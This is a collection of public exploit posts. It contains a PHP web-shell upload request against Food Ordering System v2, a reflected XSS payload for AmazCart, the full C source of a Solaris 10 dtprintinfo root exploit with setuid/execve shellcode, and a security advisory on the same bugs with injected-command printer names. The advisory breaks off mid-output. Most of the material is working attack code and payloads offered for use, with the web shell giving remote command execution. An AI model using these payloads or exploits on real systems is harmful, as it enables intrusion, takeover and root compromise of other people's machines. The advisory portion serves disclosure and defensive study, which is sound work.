<pre><code>## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE<br />## Author: nu11secur1ty<br />## Date: 01.23.2023<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0<br /><br />## Description:<br />The Food Ordering System v2 suffers from, File Upload and web-shell<br />upload RCE Vulnerabilities.<br />The upload function for the background image hover of this system is<br />not sanitizing correctly.<br />The attacker can upload some RCE malicious code and easily destroy<br />this system. The status of this system is awful!<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br /><br />```GET<br />POST /fos/admin/ajax.php?action=save_settings HTTP/1.1<br />Host: pwnedhost.com<br />Content-Length: 6157<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Origin: http://pwnedhost.com<br />Referer: http://pwnedhost.com/fos/admin/index.php?page=site_settings<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=598nahp235ehmk2broafrh37qq<br />Connection: close<br /><br />------WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Content-Disposition: form-data; name="name"<br /><br />Online Food Ordering System V2<br />------WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Content-Disposition: form-data; name="email"<br />info@sample.com<br />------WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Content-Disposition: form-data; name="contact"<br /><br />+6948 8542 623<br />------WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Content-Disposition: form-data; name="about"<br /><br /><p style="text-align: center; background: transparent; position:<br />relative;"><span style="font-size:28px;background: transparent;<br />position: relative;">ABOUT US</span></b></span></p><p<br />style="text-align: center; background: transparent; position:<br />relative;"><span style="background: transparent; position: relative;<br />font-size: 14px;"><span style="font-size:28px;background: transparent;<br />position: relative;"><b style="margin: 0px; padding: 0px; color:<br />rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;<br />text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);<br />font-family: "Open Sans", Arial, sans-serif; font-weight:<br />400; text-align: justify;">&nbsp;is simply dummy text of the printing<br />and typesetting industry. Lorem Ipsum has been the industry&#x2019;s<br />standard dummy text ever since the 1500s, when an unknown printer took<br />a galley of type and scrambled it to make a type specimen book. It has<br />survived not only five centuries, but also the leap into electronic<br />typesetting, remaining essentially unchanged. It was popularised in<br />the 1960s with the release of Letraset sheets containing Lorem Ipsum<br />passages, and more recently with desktop publishing software like<br />Aldus PageMaker including versions of Lorem<br />Ipsum.</span><br></span></b></span></p><p style="text-align: center;<br />background: transparent; position: relative;"><span style="background:<br />transparent; position: relative; font-size: 14px;"><span<br />style="font-size:28px;background: transparent; position:<br />relative;"><span style="color: rgb(0, 0, 0); font-family: "Open<br />Sans", Arial, sans-serif; font-weight: 400; text-align:<br />justify;"><br></span></b></span></p><p style="text-align: center;<br />background: transparent; position: relative;"><span style="background:<br />transparent; position: relative; font-size: 14px;"><span<br />style="font-size:28px;background: transparent; position:<br />relative;"><h2 style="font-size:28px;background: transparent;<br />position: relative;">Where does it come from?</h2><p<br />style="text-align: center; margin-bottom: 15px; padding: 0px; color:<br />rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;<br />font-weight: 400;">Contrary to popular belief, Lorem Ipsum is not<br />simply random text. It has roots in a piece of classical Latin<br />literature from 45 BC, making it over 2000 years old. Richard<br />McClintock, a Latin professor at Hampden-Sydney College in Virginia,<br />looked up one of the more obscure Latin words, consectetur, from a<br />Lorem Ipsum passage, and going through the cites of the word in<br />classical literature, discovered the undoubtable source. Lorem Ipsum<br />comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et<br />Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.<br />This book is a treatise on the theory of ethics, very popular during<br />the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit<br />amet..", comes from a line in section<br />1.10.32.</p></span></b></span></p><br />------WebKitFormBoundaryqYQLHPx3VuntGH7W<br />Content-Disposition: form-data; name="img"; filename="pic.php"<br />Content-Type: image/jpeg<br /><br /><!-- Project Name : PHP Web Shell --><br /><!-- Version : 4.0 nu11secur1ty --><br /><!-- First development date : 2022/10/05 --><br /><!-- This Version development date : 2022/10/05 --><br /><!-- Moded and working with PHP 8 : 2022/10/05 --><br /><!-- language : html, css, javascript, php --><br /><!-- Developer : nu11secur1ty --><br /><!-- Web site : https://www.nu11secur1ty.com/ --><br /><br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"<br />"http://www.w3.org/TR/html4/strict.dtd"><br /><html><br /> <head><br /> <meta http-equiv="Content-Type" content="text/html" charset="euc-kr"><br /> <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title><br /> <script type="text/javascript"><br /> function FocusIn(obj)<br /> {<br /> if(obj.value == obj.defaultValue)<br /> obj.value = '';<br /> }<br /> <br /> function FocusOut(obj)<br /> {<br /> if(obj.value == '')<br /> obj.value = obj.defaultValue;<br /> }<br /> </script><br /> </head><br /> <body><br /> <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];<br />echo $_SERVER['REQUEST_URI'] ?></b><br><br><br /> <br /> HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br><br /> REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br><br /> <br /> <br><br /> <br /> <form name="cmd_exec" method="post" action="http://<?php echo<br />$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>"><br /> <input type="text" name="cmd" size="70" maxlength="500"<br />value="Input command to execute"<br />onfocus="FocusIn(document.cmd_exec.cmd)"<br />onblur="FocusOut(document.cmd_exec.cmd)"><br /> <input type="submit" name="exec" value="exec"><br /> </form><br /> <?php<br /> if(isset($_POST['exec']))<br /> {<br /> exec($_POST['cmd'],$result);<br /><br /> echo '----------------- < OutPut > -----------------';<br /> echo '<pre>';<br /> foreach($result as $print)<br /> {<br /> $print = str_replace('<','<',$print);<br /> echo $print . '<br>';<br /> }<br /> echo '</pre>';<br /> }<br /> else echo '<br>';<br /> ?><br /> <br /> <form enctype="multipart/form-data" name="file_upload" method="post"<br />action="http://<?php echo $_SERVER['HTTP_HOST']; echo<br />$_SERVER['REQUEST_URI'] ?>"><br /> <input type="file" name="file"><br /> <input type="submit" name="upload" value="upload"><br><br /> <input type="text" name="target" size="100" value="Location where<br />file will be uploaded (include file name!)"<br />onfocus="FocusIn(document.file_upload.target)"<br />onblur="FocusOut(document.file_upload.target)"><br /> </form><br /> <?php<br /> if(isset($_POST['upload']))<br /> {<br /> $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);<br /> <br /> if($check == TRUE)<br /> echo '<pre>The file was uploaded successfully!!</pre>';<br /> else<br /> echo '<pre>File Upload was failed...</pre>';<br /> }<br /> ?><br /> </body><br /></html><br /><br />------WebKitFormBoundaryqYQLHPx3VuntGH7W--<br />```<br /><br />[+] Response:<br /><br />```HTTP<br />HTTP/1.1 200 OK<br />Date: Mon, 23 Jan 2023 12:27:44 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0<br />X-Powered-By: PHP/8.2.0<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/file-upload)<br /><br />## Proof and Exploit:<br />[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/c026hq)<br /><br />## Time spent<br />`01:00:00`<br /><br /><br /></code></pre>
<pre><code># Exploit Title: AmazCart - Laravel Ecommerce System CMS 3.4 - 'Search' Cross-Site-Scripting — Reflected (AJAX)<br /># Date: 17/01/2023<br /># Exploit Author: Sajibe Kanti<br /># CVE ID:<br /># Vendor Name: CodeThemes<br /># Vendor Homepage: https://spondonit.com/<br /># Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179<br /># Version: 3.4<br /># Tested on: Live Demo<br /># Demo Link : https://amazy.rishfa.com/<br /><br /># Description #<br /><br />AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflected<br />cross-site scripting because of insufficient user-supplied data<br />sanitization. Anyone can submit a Reflected XSS payload without login in<br />when searching for a new product on the search bar. This makes the<br />application reflect our payload in the frontend search ber, and it is fired<br />everything the search history is viewed.<br /><br /># Proof of Concept (PoC) : Exploit #<br /><br />1) Goto: https://amazy.rishfa.com/<br />2) Enter the following payload in 'Search Iteam box' : "><script>alert(1)</script><br />3) Now You Get a Popout as Alert 1<br />4) Reflected XSS payload is fired<br /><br /># Image PoC : Reference Image #<br /><br />1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB<br /></code></pre>
<pre><code>/*<br /> * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE<br /> * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info><br /> *<br /> * "What has been will be again,<br /> * what has been done will be done again;<br /> * there is nothing new under the Sun."<br /> * -- Ecclesiastes 1:9<br /> *<br /> * #Solaris #CDE #0day #ForeverDay #WontFix<br /> *<br /> * This exploit illustrates yet another way to abuse the infamous dtprintinfo<br /> * binary distributed with the Common Desktop Environment (CDE), a veritable<br /> * treasure trove for bug hunters since the 1990s. It's not the most reliable<br /> * exploit I've ever written, but I'm quite proud of the new vulnerabilities<br /> * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January<br /> * 2021) applied. The exploit chain is structured as follows:<br /> * 1. Inject a fake printer via the printer injection bug I found in lpstat.<br /> * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors().<br /> * 3. Enjoy root privileges!<br /> *<br /> * For additional details on my bug hunting journey and on the vulnerabilities<br /> * themselves, you can refer to the official advisory:<br /> * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt<br /> *<br /> * Usage:<br /> * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall<br /> * $ ./raptor_dtprintlibXmas 10.0.0.109:0<br /> * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE<br /> * Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info><br /> * <br /> * Using SI_PLATFORM : i86pc (5.10)<br /> * Using stack base : 0x8047fff<br /> * Using safe address : 0x8045790<br /> * Using rwx_mem address : 0xfeffa004<br /> * Using sc address : 0x8047fb4<br /> * Using sprintf() address : 0xfefd1250<br /> * Path of target binary : /usr/dt/bin/dtprintinfo<br /> * <br /> * On your X11 server:<br /> * 1. Select the "fnord" printer, then click on "Selected" > "Properties".<br /> * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu.<br /> *<br /> * Back to your original shell:<br /> * # id<br /> * uid=0(root) gid=1(other)<br /> *<br /> * IMPORTANT NOTE.<br /> * The buffer overflow corrupts some critical variables in memory, which we<br /> * need to fix. In order to do so, we must patch the hostile buffer at some<br /> * fixed locations with the first argument of the last call to ParseColors().<br /> * The easiest way to get such a safe address is via the special 0x41414141<br /> * command-line argument and truss, as follows:<br /> * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT<br /> * $ grep ParseColors OUT | tail -1<br /> * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724)<br /> * ^^^^^^^^^ << this is the safe address we need<br /> *<br /> * Tested on:<br /> * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021)<br /> * [previous Solaris versions are also likely vulnerable]<br /> */<br /><br />#include <fcntl.h><br />#include <link.h><br />#include <procfs.h><br />#include <stdio.h><br />#include <stdlib.h><br />#include <strings.h><br />#include <unistd.h><br />#include <sys/stat.h><br />#include <sys/systeminfo.h><br /><br />#define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE"<br />#define INFO2 "Copyright (c) 2023 Marco Ivaldi <raptor@0xdeadbeef.info>"<br /><br />#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program<br />#define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging<br />#define BUFSIZE 1106 // size of hostile buffer<br />#define PADDING 1 // hostile buffer padding<br />#define SAFE 0x08045770 // 1st arg to ParseColors()<br /><br />char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */<br />/* triple setuid() */<br />"\x31\xc0\x50\x50\xb0\x17\xcd\x91"<br />"\x31\xc0\x50\x50\xb0\x17\xcd\x91"<br />"\x31\xc0\x50\x50\xb0\x17\xcd\x91"<br />/* execve() */<br />"\x31\xc0\x50\x68/ksh\x68/bin"<br />"\x89\xe3\x50\x53\x89\xe2\x50"<br />"\x52\x53\xb0\x3b\x50\xcd\x91";<br /><br />/* globals */<br />char *arg[2] = {"foo", NULL};<br />char *env[256];<br />int env_pos = 0, env_len = 0;<br /><br />/* prototypes */<br />int add_env(char *string);<br />void check_bad(int addr, char *name);<br />int get_env_addr(char *path, char **argv);<br />int search_ldso(char *sym);<br />int search_rwx_mem(void);<br />void set_val(char *buf, int pos, int val);<br /><br />/*<br /> * main()<br /> */<br />int main(int argc, char **argv)<br />{<br /> char buf[BUFSIZE], cmd[1024], *vuln = VULN;<br /> char platform[256], release[256], display[256];<br /> int i, sc_addr, safe_addr = SAFE;<br /> FILE *fp;<br /><br /> int sb = ((int)argv[0] | 0xfff); // stack base<br /> int ret = search_ldso("sprintf"); // sprintf() in ld.so.1<br /> int rwx_mem = search_rwx_mem(); // rwx memory<br /><br /> /* helper that prints argv[0] address, used by get_env_addr() */<br /> if (!strcmp(argv[0], arg[0])) {<br /> printf("0x%p\n", argv[0]);<br /> exit(0);<br /> }<br /><br /> /* print exploit information */<br /> fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);<br /><br /> /* process command line */<br /> if ((argc < 2) || (argc > 3)) {<br /> fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n",<br /> argv[0]);<br /> exit(1);<br /> }<br /> snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]);<br /> if (argc > 2) {<br /> safe_addr = (int)strtoul(argv[2], (char **)NULL, 0);<br /> }<br /><br /> /* enter debug mode */<br /> if (safe_addr == 0x41414141) {<br /> unlink(DEBUG);<br /> snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG);<br /> if (system(cmd) == -1) {<br /> perror("error creating debug binary");<br /> exit(1);<br /> }<br /> vuln = DEBUG;<br /> }<br /><br /> /* fill envp while keeping padding */<br /> add_env("LPDEST=fnord"); // injected printer<br /> add_env("HOME=/tmp"); // home directory<br /> add_env("PATH=/usr/bin:/bin"); // path<br /> sc_addr = add_env(display); // x11 display<br /> add_env(sc); // shellcode<br /> add_env(NULL);<br /><br /> /* calculate shellcode address */<br /> sc_addr += get_env_addr(vuln, argv);<br /><br /> /* inject a fake printer */<br /> unlink("/tmp/.printers");<br /> unlink("/tmp/.printers.new");<br /> if (!(fp = fopen("/tmp/.printers", "w"))) {<br /> perror("error injecting a fake printer");<br /> exit(1);<br /> }<br /> fprintf(fp, "fnord :\n");<br /> fclose(fp);<br /> link("/tmp/.printers", "/tmp/.printers.new");<br /><br /> /* craft the hostile buffer */<br /> bzero(buf, sizeof(buf));<br /> for (i = PADDING; i < BUFSIZE - 16; i += 4) {<br /> set_val(buf, i, ret); // sprintf()<br /> set_val(buf, i += 4, rwx_mem); // saved eip<br /> set_val(buf, i += 4, rwx_mem); // 1st arg<br /> set_val(buf, i += 4, sc_addr); // 2nd arg<br /> }<br /> memcpy(buf, "\"c c ", 5); // beginning of hostile buffer<br /> buf[912] = ' '; // string separator<br /> set_val(buf, 1037, safe_addr); // safe address<br /> set_val(buf, 1065, safe_addr); // safe address<br /> set_val(buf, 1073, 0xffffffff); // -1<br /><br /> /* create the hostile XPM icon files */<br /> system("rm -fr /tmp/.dt");<br /> mkdir("/tmp/.dt", 0755);<br /> mkdir("/tmp/.dt/icons", 0755);<br /> if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) {<br /> perror("error creating XPM icon files");<br /> exit(1);<br /> }<br /> fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf);<br /> fclose(fp);<br /> link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm");<br /> link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm");<br /><br /> /* print some output */<br /> sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);<br /> sysinfo(SI_RELEASE, release, sizeof(release) - 1);<br /> fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);<br /> fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);<br /> fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr);<br /> fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);<br /> fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);<br /> fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret);<br /> fprintf(stderr, "Path of target binary\t: %s\n\n", vuln);<br /><br /> /* check for badchars */<br /> check_bad(safe_addr, "safe address");<br /> check_bad(rwx_mem, "rwx_mem address");<br /> check_bad(sc_addr, "sc address");<br /> check_bad(ret, "sprintf() address");<br /><br /> /* run the vulnerable program */<br /> execve(vuln, arg, env);<br /> perror("execve");<br /> exit(0);<br />}<br /><br />/*<br /> * add_env(): add a variable to envp and pad if needed<br /> */<br />int add_env(char *string)<br />{<br /> int i;<br /><br /> /* null termination */<br /> if (!string) {<br /> env[env_pos] = NULL;<br /> return env_len;<br /> }<br /><br /> /* add the variable to envp */<br /> env[env_pos] = string;<br /> env_len += strlen(string) + 1;<br /> env_pos++;<br /><br /> /* pad envp using zeroes */<br /> if ((strlen(string) + 1) % 4)<br /> for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {<br /> env[env_pos] = string + strlen(string);<br /> env_len++;<br /> }<br /><br /> return env_len;<br />}<br /><br />/*<br /> * check_bad(): check an address for the presence of badchars<br /> */<br />void check_bad(int addr, char *name)<br />{<br /> int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP<br /><br /> for (i = 0; i < sizeof(bad) / sizeof(int); i++) {<br /> if (((addr & 0xff) == bad[i]) || <br /> ((addr & 0xff00) == bad[i]) ||<br /> ((addr & 0xff0000) == bad[i]) || <br /> ((addr & 0xff000000) == bad[i])) {<br /> fprintf(stderr, "error: %s contains a badchar\n", name);<br /> exit(1);<br /> }<br /> }<br />}<br /><br />/*<br /> * get_env_addr(): get environment address using a helper program<br /> */<br />int get_env_addr(char *path, char **argv)<br />{<br /> char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";<br /> char hex[11];<br /> int fd[2], addr;<br /><br /> /* truncate program name at correct length and create a hard link */<br /> prog[strlen(path)] = '\0';<br /> unlink(prog);<br /> link(argv[0], prog);<br /><br /> /* open pipe to read program output */<br /> if (pipe(fd) == -1) {<br /> perror("pipe");<br /> exit(1);<br /> }<br /><br /> switch(fork()) {<br /><br /> case -1: /* cannot fork */<br /> perror("fork");<br /> exit(1);<br /><br /> case 0: /* child */<br /> dup2(fd[1], 1);<br /> close(fd[0]);<br /> close(fd[1]);<br /> execve(prog, arg, env);<br /> perror("execve");<br /> exit(1);<br /><br /> default: /* parent */<br /> close(fd[1]);<br /> read(fd[0], hex, sizeof(hex));<br /> break;<br /> }<br /><br /> /* check address */<br /> if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {<br /> fprintf(stderr, "error: cannot read address from helper\n");<br /> exit(1);<br /> }<br /><br /> return addr + strlen(arg[0]) + 1;<br />}<br /><br />/*<br /> * search_ldso(): search for a symbol inside ld.so.1<br /> */<br />int search_ldso(char *sym)<br />{<br /> int addr;<br /> void *handle;<br /> Link_map *lm;<br /><br /> /* open the executable object file */<br /> if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {<br /> perror("dlopen");<br /> exit(1);<br /> }<br /><br /> /* get dynamic load information */<br /> if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {<br /> perror("dlinfo");<br /> exit(1);<br /> }<br /><br /> /* search for the address of the symbol */<br /> if ((addr = (int)dlsym(handle, sym)) == NULL) {<br /> fprintf(stderr, "sorry, function %s() not found\n", sym);<br /> exit(1);<br /> }<br /><br /> /* close the executable object file */<br /> dlclose(handle);<br /><br /> return addr;<br />}<br /><br />/*<br /> * search_rwx_mem(): search for an RWX memory segment valid for all<br /> * programs (typically, /usr/lib/ld.so.1) using the proc filesystem<br /> */<br />int search_rwx_mem(void)<br />{<br /> int fd;<br /> char tmp[16];<br /> prmap_t map;<br /> int addr = 0, addr_old;<br /><br /> /* open the proc filesystem */<br /> sprintf(tmp,"/proc/%d/map", (int)getpid());<br /> if ((fd = open(tmp, O_RDONLY)) < 0) {<br /> fprintf(stderr, "can't open %s\n", tmp);<br /> exit(1);<br /> }<br /><br /> /* search for the last RWX memory segment before stack (last - 1) */<br /> while (read(fd, &map, sizeof(map)))<br /> if (map.pr_vaddr)<br /> if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {<br /> addr_old = addr;<br /> addr = map.pr_vaddr;<br /> }<br /> close(fd);<br /><br /> /* add 4 to the exact address NUL bytes */<br /> if (!(addr_old & 0xff))<br /> addr_old |= 0x04;<br /> if (!(addr_old & 0xff00))<br /> addr_old |= 0x0400;<br /><br /> return addr_old;<br />}<br /><br />/*<br /> * set_val(): copy a dword inside a buffer (little endian)<br /> */<br />void set_val(char *buf, int pos, int val)<br />{<br /> buf[pos] = (val & 0x000000ff);<br /> buf[pos + 1] = (val & 0x0000ff00) >> 8;<br /> buf[pos + 2] = (val & 0x00ff0000) >> 16;<br /> buf[pos + 3] = (val & 0xff000000) >> 24;<br />}<br /></code></pre>
<pre><code>--[ HNS-2022-01 - HN Security Advisory - https://security.humanativaspa.it/<br /><br />* Title: Multiple vulnerabilities in Solaris dtprintinfo and libXm/libXpm<br />* Products: Common Desktop Environment 1.6, Motif 2.1, X.Org libXpm < 3.5.15<br />* OS: Oracle Solaris 10 (CPU January 2021)<br />* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it><br />* Date: 2023-01-18<br />* Oracle vulnerability tracking numbers:<br /> * S1597707 - Arbitrary printer name injection<br /> * S1597724 - Heap memory disclosure via long printer names<br /> * S1597711 - Memory corruption via malformed icon files<br /> * S1597730 - Stack-based buffer overflow in libXm ParseColors<br />* CVE IDs:<br /> * CVE-2022-46285 - Infinite loop on unclosed comments in X.Org libXpm<br />* Advisory URLs: <br /> * https://github.com/hnsecurity/vulns/blob/main/HNS-2022-01-dtprintinfo.txt<br /> * https://lists.x.org/archives/xorg-announce/2023-January/003312.html<br /> * https://lists.x.org/archives/xorg-announce/2023-January/003313.html<br />* Exploit URLs:<br /> * https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtprintlibXmas.c<br /><br /><br />--[ 0 - Table of contents<br /><br />1 - Summary<br />2 - Vulnerabilities<br /> 2.1 - Arbitrary printer name injection<br /> 2.2 - Heap memory disclosure via long printer names<br /> 2.3 - Memory corruption via malformed icon files<br /> 2.4 - Stack-based buffer overflow in libXm ParseColors()<br />3 - Analysis<br /> 3.1 - Printer name injection and heap memory disclosure<br /> 3.2 - Memory corruption via malformed icon files<br />4 - Exploitation<br />5 - Affected products<br />6 - Remediation<br />7 - Disclosure timeline<br />8 - References<br /><br /><br />--[ 1 - Summary<br /><br />"What has been will be again,<br /> what has been done will be done again;<br /> there is nothing new under the Sun."<br /> -- Ecclesiastes 1:9<br /><br />We have identified multiple security vulnerabilities that are exploitable<br />via the the setuid-root dtprintinfo binary from the Common Desktop<br />Environment (CDE) distributed with Oracle Solaris 10 (CPU January 2021):<br /><br />* A bug in the parser of the lpstat external command invoked by dtprintinfo<br /> to list the names of available printers allows low-privileged local users<br /> to inject arbitrary printer names via the $HOME/.printers file.<br /><br />* Printer name injection allows low-privileged local users to manipulate<br /> the control flow of the target program and disclose memory contents.<br /> Based on our analysis, this bug does not seem to be directly exploitable<br /> to achieve arbitrary code execution. However, we recommend treating it as<br /> a potential security vulnerability and fix it as such.<br /><br />* The ability to inject arbitrary printer names opens other attack vectors<br /> that otherwise would not be available on systems without configured<br /> printers. As an example, we discovered multiple icon parsing bugs in the<br /> Motif library libXm that cause memory corruption.<br /><br />We demonstrated the possibility to exploit one of these memory corruption<br />bugs, a stack-based buffer overflow in the ParseColors() function of libXm,<br />to achieve local privilege escalation to root on Solaris 10.<br /><br /><br />--[ 2 - Vulnerabilities<br /><br />Following our last CDE vulnerability disclosures [1], Oracle kindly shared<br />with us a copy of their then current Solaris 10 security patch set (CPU<br />January 2021), so that we could install it in our lab and verify the fixes<br />for the bugs we had reported.<br /><br />In addition to verifying these fixes, we decided to take a closer look at<br />the dtprintinfo program distributed with CDE, because of its complexity and<br />its impressive historical record of high-impact vulnerabilities [2]. These<br />are the results of our research.<br /><br /><br />--[ 2.1 - Arbitrary printer name injection<br /><br />After fruitlessly spending a few days reversing and auditing the patched<br />version of dtprintinfo, we came up with the idea of using the poor man's<br />fuzzer below to quickly check for the presence of flaws in the parsing of<br />the $HOME/.printers file:<br /><br />bash-3.2$ cat /dev/urandom > ~/.printers<br />^C<br /><br />Indeed, this led to immediate results. It turns out that it is possible to<br />inject fake printers to be displayed by dtprintinfo. To do so, we need to<br />craft a .printers file that contains at least one line in the following<br />format:<br /><br /><string><space>:<\n><br /><br />Where <string> can be any string, including most special characters, and<br /><space> can either be a space (0x20) or a tab (0x09) character. For<br />instance, the following line will inject a fake printer named "FOO":<br /><br />FOO :<br /><br />Since dtprintinfo uses printer names as arguments for some external<br />commands that it invokes, it is possible to abuse this flaw to inject<br />arbitrary commands. For instance, to execute an injected command when we<br />double-click on a printer icon in the X11 GUI, we can craft a .printers<br />file that contains lines such as the following (space and tab characters<br />cannot be used in the injected command string for obvious reasons):<br /><br />FOO;/usr/bin/id>/tmp/pwned; :<br />BAR;/usr/bin/cat</tmp/PAYLOAD; :<br /><br />Unfortunately for us attackers, dtprintinfo fork()s and permanently drops<br />root privileges via setuid() before running external commands. Therefore,<br />the injected commands are executed with regular user privileges. This means<br />we can only abuse the described printer name injection bug to trigger an<br />additional second-order vulnerability, if such a vulnerability exists.<br />Here's a couple of ideas we have experimented with to no avail:<br /><br />* Use the "cat<PAYLOAD" pattern above to trigger either an integer<br /> overflow, a buffer overflow, or a format string bug.<br />* Inject a printer name that contains a format string or a directory<br /> traversal payload to trigger some other bug down the line.<br /><br />The third obvious idea is to inject a long printer name and see what<br />happens. What happened in our case is that we were able to trigger an<br />out-of-bound read and disclose partial heap memory contents of our target<br />setuid-root binary.<br /><br /><br />--[ 2.2 - Heap memory disclosure via long printer names<br /><br />To reproduce this bug, first craft a malicious .printers file as follows<br />and create a hardlink to it named .printers.new, to prevent renaming by the<br />DtConfigPrinters::renameUserPrinterSelectionFile() method that gets called<br />while dtprintinfo is initializing queues in DtApp::UpdateQueues():<br /><br />bash-3.2$ echo "FOO;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; :" > ~/.printers<br />bash-3.2$ ln ~/.printers ~/.printers.new<br /><br />Then, trace dtprintinfo's execution via a setuid-root truss program to log<br />access to interesting memory addresses:<br /><br />bash-3.2$ export DISPLAY=:0<br />bash-3.2$ truss -fae -u '*' -u a.out /usr/dt/bin/dtprintinfo -all 2> OUT<br /><br />At this point, in dtprintinfo's GUI:<br /><br />* Select "View" > "Select Printers to Show..." from the menu.<br />* Select the injected printer to be shown.<br />* Click on "Apply" and then click on "OK".<br />* Select "Printers" > "Exit" from the menu, closing dtprintinfo.<br /><br />Now, examining the .printers file modified by dtprintinfo while it was<br />running, we can notice that it contains non-printable characters, which are<br />in fact leaked heap memory contents. For instance:<br /><br />bash-3.2$ od -x ~/.printers<br />0000000 615f 6c6c 5c20 460a 